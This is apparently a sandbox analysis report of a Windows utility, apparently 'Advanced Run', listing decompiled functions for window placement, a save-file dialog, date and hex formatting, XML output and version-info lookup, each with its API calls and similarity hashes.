                                                                                                                                                                                                                          					_v8 = GetSystemMetrics(0x4e);
                                                                                                                                                                                                                          					_v12 = GetSystemMetrics(0x4f);
                                                                                                                                                                                                                          					_t41 = GetSystemMetrics(0x4c);
                                                                                                                                                                                                                          					_t31 = GetSystemMetrics(0x4d);
                                                                                                                                                                                                                          					if(_v8 == 0 || _v12 == 0) {
                                                                                                                                                                                                                          						_v8 = GetSystemMetrics(0);
                                                                                                                                                                                                                          						_v12 = GetSystemMetrics(1);
                                                                                                                                                                                                                          						_t41 = 0;
                                                                                                                                                                                                                          						_t31 = 0;
                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                          						_v8 = _v8 + _t41;
                                                                                                                                                                                                                          						_v12 = _v12 + _t31;
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					_t50 = _v20 - _v28;
                                                                                                                                                                                                                          					if(_t50 > 0x14) {
                                                                                                                                                                                                                          						_t38 = _v24;
                                                                                                                                                                                                                          						_t37 = _v16 - _t38;
                                                                                                                                                                                                                          						if(_t37 > 0x14 && _v20 > _t41 + 5) {
                                                                                                                                                                                                                          							_t31 = _t31 + 0xfffffff6;
                                                                                                                                                                                                                          							if(_t38 >= _t31) {
                                                                                                                                                                                                                          								_t31 = _v28;
                                                                                                                                                                                                                          								if(_t31 + 0x14 < _v8 && _t38 + 0x14 < _v12 &&  *((intOrPtr*)(_t34 + 0x1c)) != 0) {
                                                                                                                                                                                                                          									_t31 = SetWindowPos( *(_t34 + 0x10), 0, _t31, _t38, _t50, _t37, 0x204);
                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					return _t31;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          			}

















                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetSystemMetrics.USER32 ref: 00402C1C
                                                                                                                                                                                                                          • GetSystemMetrics.USER32 ref: 00402C23
                                                                                                                                                                                                                          • GetSystemMetrics.USER32 ref: 00402C2A
                                                                                                                                                                                                                          • GetSystemMetrics.USER32 ref: 00402C30
                                                                                                                                                                                                                          • GetSystemMetrics.USER32 ref: 00402C47
                                                                                                                                                                                                                          • GetSystemMetrics.USER32 ref: 00402C4E
                                                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204,?,?,?,?,?,?,?,?,0040365B), ref: 00402CA5
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MetricsSystem$Window
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1155976603-0
                                                                                                                                                                                                                          • Opcode ID: 03bfd9196a1312a0750f0a2641b8d8190b91a017e6f04a5dd0b934da2af22e19
                                                                                                                                                                                                                          • Instruction ID: 7065afd7c6b37d04baa6ac94661e9c3c7a9384fc7fb7d7b8ebf201216021487f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 03bfd9196a1312a0750f0a2641b8d8190b91a017e6f04a5dd0b934da2af22e19
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B9217F72D00219EBEF14DF68CE496AF7B75EF40318F11446AD901BB1C5D2B8AD81CA98
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E004036D5(void* __edi, void* __eflags) {
                                                                                                                                                                                                                          				intOrPtr _v8;
                                                                                                                                                                                                                          				char _v12;
                                                                                                                                                                                                                          				intOrPtr _v16;
                                                                                                                                                                                                                          				intOrPtr _v20;
                                                                                                                                                                                                                          				char* _v24;
                                                                                                                                                                                                                          				char _v28;
                                                                                                                                                                                                                          				char* _v48;
                                                                                                                                                                                                                          				intOrPtr _v56;
                                                                                                                                                                                                                          				intOrPtr _v60;
                                                                                                                                                                                                                          				int _v64;
                                                                                                                                                                                                                          				int _v72;
                                                                                                                                                                                                                          				intOrPtr _v76;
                                                                                                                                                                                                                          				wchar_t* _v80;
                                                                                                                                                                                                                          				intOrPtr _v84;
                                                                                                                                                                                                                          				int _v92;
                                                                                                                                                                                                                          				char* _v96;
                                                                                                                                                                                                                          				intOrPtr _v104;
                                                                                                                                                                                                                          				struct tagOFNA _v108;
                                                                                                                                                                                                                          				void _v634;
                                                                                                                                                                                                                          				long _v636;
                                                                                                                                                                                                                          				void _v2682;
                                                                                                                                                                                                                          				char _v2684;
                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                          				char _t37;
                                                                                                                                                                                                                          				intOrPtr _t38;
                                                                                                                                                                                                                          				int _t46;
                                                                                                                                                                                                                          				signed short _t54;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_v636 = 0;
                                                                                                                                                                                                                          				memset( &_v634, 0, 0x208);
                                                                                                                                                                                                                          				_v2684 = 0;
                                                                                                                                                                                                                          				memset( &_v2682, 0, 0x7fe);
                                                                                                                                                                                                                          				_t37 =  *((intOrPtr*)(L"cfg")); // 0x660063
                                                                                                                                                                                                                          				_v12 = _t37;
                                                                                                                                                                                                                          				_t38 =  *0x40cbf0; // 0x67
                                                                                                                                                                                                                          				_v8 = _t38;
                                                                                                                                                                                                                          				_v28 = E00405B81(0x227);
                                                                                                                                                                                                                          				_v24 = L"*.cfg";
                                                                                                                                                                                                                          				_v20 = E00405B81(0x228);
                                                                                                                                                                                                                          				_v16 = L"*.*";
                                                                                                                                                                                                                          				E00405236( &_v2684,  &_v28);
                                                                                                                                                                                                                          				_t54 = 0xa;
                                                                                                                                                                                                                          				_v60 = E00405B81(_t54);
                                                                                                                                                                                                                          				_v104 =  *((intOrPtr*)(__edi + 0x10));
                                                                                                                                                                                                                          				_v48 =  &_v12;
                                                                                                                                                                                                                          				_v96 =  &_v2684;
                                                                                                                                                                                                                          				_v108 = 0x4c;
                                                                                                                                                                                                                          				_v92 = 0;
                                                                                                                                                                                                                          				_v84 = 1;
                                                                                                                                                                                                                          				_v80 =  &_v636;
                                                                                                                                                                                                                          				_v76 = 0x104;
                                                                                                                                                                                                                          				_v72 = 0;
                                                                                                                                                                                                                          				_v64 = 0;
                                                                                                                                                                                                                          				_v56 = 0x80806;
                                                                                                                                                                                                                          				_t46 = GetSaveFileNameW( &_v108);
                                                                                                                                                                                                                          				if(_t46 != 0) {
                                                                                                                                                                                                                          					wcscpy( &_v636, _v80);
                                                                                                                                                                                                                          					return E0040365E(__edi, 1,  &_v636);
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				return _t46;
                                                                                                                                                                                                                          			}

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004036F6
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00403712
                                                                                                                                                                                                                            • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                                                                                                                                                            • Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                                                                                                                                                            • Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99
                                                                                                                                                                                                                            • Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
                                                                                                                                                                                                                            • Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
                                                                                                                                                                                                                            • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                                                                                                                                                            • Part of subcall function 00405236: memset.MSVCRT ref: 00405257
                                                                                                                                                                                                                            • Part of subcall function 00405236: _snwprintf.MSVCRT ref: 00405285
                                                                                                                                                                                                                            • Part of subcall function 00405236: wcslen.MSVCRT ref: 00405291
                                                                                                                                                                                                                            • Part of subcall function 00405236: memcpy.MSVCRT ref: 004052A9
                                                                                                                                                                                                                            • Part of subcall function 00405236: wcslen.MSVCRT ref: 004052B7
                                                                                                                                                                                                                            • Part of subcall function 00405236: memcpy.MSVCRT ref: 004052CA
                                                                                                                                                                                                                          • GetSaveFileNameW.COMDLG32(?), ref: 004037AF
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 004037C3
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memcpymemsetwcslen$HandleModulewcscpy$FileLoadNameSaveString_snwprintf
                                                                                                                                                                                                                          • String ID: L$cfg
                                                                                                                                                                                                                          • API String ID: 275899518-3734058911
                                                                                                                                                                                                                          • Opcode ID: 82f9c32c0c79633b068e26f34505a517ae9d13a5a1787d7b2c1c5d310a57e8a8
                                                                                                                                                                                                                          • Instruction ID: 069f946bae6f7cb0c9846f37a0b0d91fba0b14879ba0d1f27e167351657a8a18
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 82f9c32c0c79633b068e26f34505a517ae9d13a5a1787d7b2c1c5d310a57e8a8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 78312AB1D04218AFDB50DFA5D889ADEBBB8FF04314F10416AE508B6280DB746A85CF99
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E00404ED0(FILETIME* __eax, wchar_t* _a4) {
                                                                                                                                                                                                                          				struct _SYSTEMTIME _v20;
                                                                                                                                                                                                                          				long _v276;
                                                                                                                                                                                                                          				long _v532;
                                                                                                                                                                                                                          				FILETIME* _t15;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t15 = __eax;
                                                                                                                                                                                                                          				if(__eax->dwHighDateTime != 0 ||  *__eax != 0) {
                                                                                                                                                                                                                          					if(FileTimeToSystemTime(_t15,  &_v20) == 0 || _v20 <= 0x3e8) {
                                                                                                                                                                                                                          						goto L5;
                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                          						GetDateFormatW(0x400, 1,  &_v20, 0,  &_v276, 0x80);
                                                                                                                                                                                                                          						GetTimeFormatW(0x400, 0,  &_v20, 0,  &_v532, 0x80);
                                                                                                                                                                                                                          						wcscpy(_a4,  &_v276);
                                                                                                                                                                                                                          						wcscat(_a4, " ");
                                                                                                                                                                                                                          						wcscat(_a4,  &_v532);
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					L5:
                                                                                                                                                                                                                          					wcscpy(_a4, 0x40c4e8);
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				return _a4;
                                                                                                                                                                                                                          			}








                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00404EEE
                                                                                                                                                                                                                          • GetDateFormatW.KERNEL32(00000400,00000001,000003E8,00000000,?,00000080,?,?,?,?), ref: 00404F1C
                                                                                                                                                                                                                          • GetTimeFormatW.KERNEL32(00000400,00000000,000003E8,00000000,?,00000080,?,?,?,?), ref: 00404F31
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 00404F41
                                                                                                                                                                                                                          • wcscat.MSVCRT ref: 00404F4E
                                                                                                                                                                                                                          • wcscat.MSVCRT ref: 00404F5D
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 00404F71
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1331804452-0
                                                                                                                                                                                                                          • Opcode ID: bcd4d34c10f2eb1284b4297ba1ca8defa1a10ff7f0e8a8f4937edf2a6ab2f069
                                                                                                                                                                                                                          • Instruction ID: 27f756489727a3478797c508db698983d473b6c4fef27ef98cb5a9ae0a7a07e8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bcd4d34c10f2eb1284b4297ba1ca8defa1a10ff7f0e8a8f4937edf2a6ab2f069
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 951160B2840119EBDB11AB94DC85EFE776CFB44304F04457ABA05B6090D774AA858BA8
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 71%
                                                                                                                                                                                                                          			E00404FE0(wchar_t* __edi, intOrPtr _a4, signed int _a8) {
                                                                                                                                                                                                                          				void _v514;
                                                                                                                                                                                                                          				long _v516;
                                                                                                                                                                                                                          				wchar_t* _t34;
                                                                                                                                                                                                                          				signed int _t35;
                                                                                                                                                                                                                          				void* _t36;
                                                                                                                                                                                                                          				void* _t37;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t34 = __edi;
                                                                                                                                                                                                                          				_v516 = _v516 & 0x00000000;
                                                                                                                                                                                                                          				memset( &_v514, 0, 0x1fc);
                                                                                                                                                                                                                          				 *__edi =  *__edi & 0x00000000;
                                                                                                                                                                                                                          				_t37 = _t36 + 0xc;
                                                                                                                                                                                                                          				_t35 = 0;
                                                                                                                                                                                                                          				do {
                                                                                                                                                                                                                          					_push( *(_t35 + _a4) & 0x000000ff);
                                                                                                                                                                                                                          					_push(L"%2.2X");
                                                                                                                                                                                                                          					_push(0xff);
                                                                                                                                                                                                                          					_push( &_v516);
                                                                                                                                                                                                                          					L0040B1EC();
                                                                                                                                                                                                                          					_t37 = _t37 + 0x10;
                                                                                                                                                                                                                          					if(_t35 > 0) {
                                                                                                                                                                                                                          						wcscat(_t34, " ");
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					if(_a8 > 0) {
                                                                                                                                                                                                                          						asm("cdq");
                                                                                                                                                                                                                          						if(_t35 % _a8 == 0) {
                                                                                                                                                                                                                          							wcscat(_t34, L"  ");
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					wcscat(_t34,  &_v516);
                                                                                                                                                                                                                          					_t35 = _t35 + 1;
                                                                                                                                                                                                                          				} while (_t35 < 0x80);
                                                                                                                                                                                                                          				return _t34;
                                                                                                                                                                                                                          			}










                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: wcscat$_snwprintfmemset
                                                                                                                                                                                                                          • String ID: %2.2X
                                                                                                                                                                                                                          • API String ID: 2521778956-791839006
                                                                                                                                                                                                                          • Opcode ID: 34c89676a934ea4f3d268c8f85442ed9bc59df14bbff203197c18b8f91f69b12
                                                                                                                                                                                                                          • Instruction ID: 93e5f8641594d75a0278127c9762c797554eaad4f41234795e116b90c7bd1a0f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 34c89676a934ea4f3d268c8f85442ed9bc59df14bbff203197c18b8f91f69b12
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FA01B57394072566E72067569C86BBB33ACEB41714F10407BFD14B91C2EB7CDA444ADC
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 42%
                                                                                                                                                                                                                          			E00407D80(intOrPtr* __ecx, intOrPtr _a4) {
                                                                                                                                                                                                                          				void _v514;
                                                                                                                                                                                                                          				char _v516;
                                                                                                                                                                                                                          				void _v1026;
                                                                                                                                                                                                                          				char _v1028;
                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                          				intOrPtr* _t16;
                                                                                                                                                                                                                          				void* _t19;
                                                                                                                                                                                                                          				intOrPtr* _t29;
                                                                                                                                                                                                                          				char* _t31;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t29 = __ecx;
                                                                                                                                                                                                                          				_v516 = 0;
                                                                                                                                                                                                                          				memset( &_v514, 0, 0x1fc);
                                                                                                                                                                                                                          				_v1028 = 0;
                                                                                                                                                                                                                          				memset( &_v1026, 0, 0x1fc);
                                                                                                                                                                                                                          				_t16 = _t29;
                                                                                                                                                                                                                          				if( *((intOrPtr*)(_t29 + 0x24)) == 0) {
                                                                                                                                                                                                                          					_push(L"<?xml version=\"1.0\" encoding=\"ISO-8859-1\" ?>\r\n");
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					_push(L"<?xml version=\"1.0\" ?>\r\n");
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				E00407343(_t16);
                                                                                                                                                                                                                          				_t19 =  *((intOrPtr*)( *_t29 + 0x24))(_a4);
                                                                                                                                                                                                                          				_t31 =  &_v516;
                                                                                                                                                                                                                          				E00407250(_t31, _t19);
                                                                                                                                                                                                                          				_push(_t31);
                                                                                                                                                                                                                          				_push(L"<%s>\r\n");
                                                                                                                                                                                                                          				_push(0xff);
                                                                                                                                                                                                                          				_push( &_v1028);
                                                                                                                                                                                                                          				L0040B1EC();
                                                                                                                                                                                                                          				return E00407343(_t29, _a4,  &_v1028);
                                                                                                                                                                                                                          			}













                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • <?xml version="1.0" ?>, xrefs: 00407DC9
                                                                                                                                                                                                                          • <%s>, xrefs: 00407DF3
                                                                                                                                                                                                                          • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00407DD0
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$_snwprintf
                                                                                                                                                                                                                          • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                                                                                                                          • API String ID: 3473751417-2880344631
                                                                                                                                                                                                                          • Opcode ID: 9364f374d7518812a9165f05dfc0ba647ea39d808db9dc8e90e0893e61590c4e
                                                                                                                                                                                                                          • Instruction ID: f522b8c77a058770ba0888167d6ec5df55c59d6d485a4440fbbc7c77367e2349
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9364f374d7518812a9165f05dfc0ba647ea39d808db9dc8e90e0893e61590c4e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E0019BB1E402197AD710A695CC45FBE766CEF44344F0001FBBA08F3191D738AE4586ED
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 70%
                                                                                                                                                                                                                          			E00403B3C(intOrPtr _a4) {
                                                                                                                                                                                                                          				void _v526;
                                                                                                                                                                                                                          				char _v528;
                                                                                                                                                                                                                          				void _v2574;
                                                                                                                                                                                                                          				char _v2576;
                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                          				intOrPtr _t29;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_v2576 = 0;
                                                                                                                                                                                                                          				memset( &_v2574, 0, 0x7fe);
                                                                                                                                                                                                                          				_v528 = 0;
                                                                                                                                                                                                                          				memset( &_v526, 0, 0x208);
                                                                                                                                                                                                                          				E00404AD9( &_v528);
                                                                                                                                                                                                                          				_push( &_v528);
                                                                                                                                                                                                                          				_push(L"\"%s\" /EXEFilename \"%%1\"");
                                                                                                                                                                                                                          				_push(0x3ff);
                                                                                                                                                                                                                          				_push( &_v2576);
                                                                                                                                                                                                                          				L0040B1EC();
                                                                                                                                                                                                                          				_t37 = _a4 + 0xa68;
                                                                                                                                                                                                                          				E00404923(0x104, _a4 + 0xa68, L"exefile");
                                                                                                                                                                                                                          				E00404923(0x104, _a4 + 0xc72, L"Advanced Run");
                                                                                                                                                                                                                          				E00404923(0x3ff, _t37 + 0x414,  &_v2576);
                                                                                                                                                                                                                          				_t29 = E0040467A(_t37);
                                                                                                                                                                                                                          				 *((intOrPtr*)(_a4 + 0x167c)) = _t29;
                                                                                                                                                                                                                          				return _t29;
                                                                                                                                                                                                                          			}










                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00403B5D
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00403B76
                                                                                                                                                                                                                            • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 00403B9F
                                                                                                                                                                                                                            • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                                                                                                                                                            • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                                                                                                                                                            • Part of subcall function 0040467A: memset.MSVCRT ref: 004046AF
                                                                                                                                                                                                                            • Part of subcall function 0040467A: _snwprintf.MSVCRT ref: 004046CD
                                                                                                                                                                                                                            • Part of subcall function 0040467A: RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,?,?,?,?,?,00020019), ref: 004046E6
                                                                                                                                                                                                                            • Part of subcall function 0040467A: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00020019), ref: 004046FA
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
• Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
• Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
• Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$_snwprintf$CloseFileModuleNameOpenmemcpywcslen
                                                                                                                                                                                                                          • String ID: "%s" /EXEFilename "%%1"$Advanced Run$exefile
                                                                                                                                                                                                                          • API String ID: 1832587304-479876776
                                                                                                                                                                                                                          • Opcode ID: 0a24b3981c90f53bc0afe707e01056d79404e7683c9323ccd1d0569bed7942f0
                                                                                                                                                                                                                          • Instruction ID: c5548abdd2f98fe5b378efca96f69d72dd5acd8230f4ce7b006819db5738462c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0a24b3981c90f53bc0afe707e01056d79404e7683c9323ccd1d0569bed7942f0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6B11A3B29403186AD720E761CC05ACF776CDF45314F0041B6BA08B71C2D77C5B418B9E
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E0040AFBE(void* __esi, void* _a4, wchar_t* _a8, wchar_t* _a12) {
                                                                                                                                                                                                                          				void* _v8;
                                                                                                                                                                                                                          				int _v12;
                                                                                                                                                                                                                          				short _v524;
                                                                                                                                                                                                                          				char _v1036;
                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				wcscpy( &_v524, L"\\StringFileInfo\\");
                                                                                                                                                                                                                          				wcscat( &_v524, _a8);
                                                                                                                                                                                                                          				wcscat( &_v524, "\\");
                                                                                                                                                                                                                          				wcscat( &_v524, _a12);
                                                                                                                                                                                                                          				if(VerQueryValueW(_a4,  &_v524,  &_v8,  &_v12) == 0) {
                                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_t34 =  &_v1036;
                                                                                                                                                                                                                          				E00404923(0xff,  &_v1036, _v8);
                                                                                                                                                                                                                          				E004049A2(_t34, __esi);
                                                                                                                                                                                                                          				return 1;
                                                                                                                                                                                                                          			}









                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040AFD3
                                                                                                                                                                                                                          • wcscat.MSVCRT ref: 0040AFE2
                                                                                                                                                                                                                          • wcscat.MSVCRT ref: 0040AFF3
                                                                                                                                                                                                                          • wcscat.MSVCRT ref: 0040B002
                                                                                                                                                                                                                          • VerQueryValueW.VERSION(?,?,00000000,?), ref: 0040B01C
                                                                                                                                                                                                                            • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                                                                                                                                                            • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                                                                                                                                                            • Part of subcall function 004049A2: lstrcpyW.KERNEL32(?,?), ref: 004049B7
                                                                                                                                                                                                                            • Part of subcall function 004049A2: lstrlenW.KERNEL32(?), ref: 004049BE
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
• Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
• Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
• Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: wcscat$QueryValuelstrcpylstrlenmemcpywcscpywcslen
                                                                                                                                                                                                                          • String ID: \StringFileInfo\
                                                                                                                                                                                                                          • API String ID: 393120378-2245444037
                                                                                                                                                                                                                          • Opcode ID: 045a8df20043a551ca88a82222e75e8b313ea16cabd954164b3126fb0df90005
                                                                                                                                                                                                                          • Instruction ID: 46c7c43bb965d9609608e4f6c2ae6b517043b349f439a100f6d085a340de75fe
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 045a8df20043a551ca88a82222e75e8b313ea16cabd954164b3126fb0df90005
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CF015EB290020DA6DB11EAA2CC45DDF776DDB44304F0005B6B654F2092EB3CDA969A98
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
• Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
• Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
• Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _snwprintfwcscpy
                                                                                                                                                                                                                          • String ID: dialog_%d$general$menu_%d$strings
                                                                                                                                                                                                                          • API String ID: 999028693-502967061
                                                                                                                                                                                                                          • Opcode ID: b64df2e80323ba4b17253e10f943d6139d2bc5d6bf6da17a7692c82038848a44
                                                                                                                                                                                                                          • Instruction ID: fc2f6d5a95cb840c7437c23e5da9cc5f651b22c54dcbfaa02992beb3cb27aad2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b64df2e80323ba4b17253e10f943d6139d2bc5d6bf6da17a7692c82038848a44
